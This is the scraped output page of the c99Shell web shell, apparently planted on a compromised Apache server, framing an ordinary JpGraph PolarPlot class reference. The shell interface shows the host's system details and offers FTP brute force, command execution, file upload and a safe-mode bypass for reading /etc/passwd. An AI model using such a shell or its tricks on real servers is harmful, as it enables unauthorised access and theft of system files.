!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PolarPlot.html (10.86 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS PolarPlot
(Defined in: jpgraph_polar.php : 37)
 PolarPlot 
 PolarPlot() 
 SetColor() 
 SetCSIMTargets() 
 SetFillColor() 
 SetLegend() 
 SetWeight() 
 

Class usage and Overview
Represents a polar plot. A polar plot is a line plot that may have marks or be filled. Public properties are
  • mark, Instance of class PlotMark. Make sit possible to add Plot marks in the plot.

 

See also related classes:
PlotMark

 


Class Methods

 

 

Constructor. Create a new Polar plot

ArgumentDefaultDescription
$aData  Data array

Description
A polar plot is created form an array of (angle,radius) specification for each plot point.. 

Example

$pdata = array(0,0,15,35,40,70,70,120);

$polarplot = new PolarPlot($pdata);
$polarplot->SetFillColor('lightblue@0.5');

$polargraph->Add($polarplot);

$polargraph->Stroke();

 

 

Specify line color for polar plot

ArgumentDefaultDescription
$aColor  Line Color

Description
Specify line color for polar plot 

Example

$polarplot->SetColor('navy');

 

 

Specify URL targets for markers

ArgumentDefaultDescription
$aTargets  URL targets
$aAlts null Alt texts

Description
Specify URL targets for markers on the polar plot. If you have specified a mark the polar plot you can add URL targets for each mark with this method. Remember that to create an image map graph you need to construct the graph with the Graph::StrokeCSIM() method instead of the ordinary Graph::Stroke() 
 
See also
Graph::StrokeCSIM

Example

// Dummy targets
$t = array('#1','#2','#3','#4','#5','#6');

$polarplot->SetCSIMTargets($t);


 

 

Specify fill color for plot

ArgumentDefaultDescription
$aColor  Fill color

Description
Specify fill color for plot. If the fill color is specified as '' then no fill will be used. 
 
See also
PolarPlot::SetColor

Example

$polarplot->SetFillColor('orange');

 

 

Specify legend text for the plot

ArgumentDefaultDescription
$aLegend  Legend text
$aCSIM "" URL target for this legend
$aCSIMAlt "" ALT text for this legend

Description
Specify legend text for the plot. When image maps are used you can also specify a URL for this legend. 

Example

$polarplot->SetLegend('Year 2002');

 

 

Sepcify line weight (in pixels)

ArgumentDefaultDescription
$aWeight  Line weight

Description
Sepcify line weight for plot 

Example

$polarplot->SetWeight(2);



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.005 ]--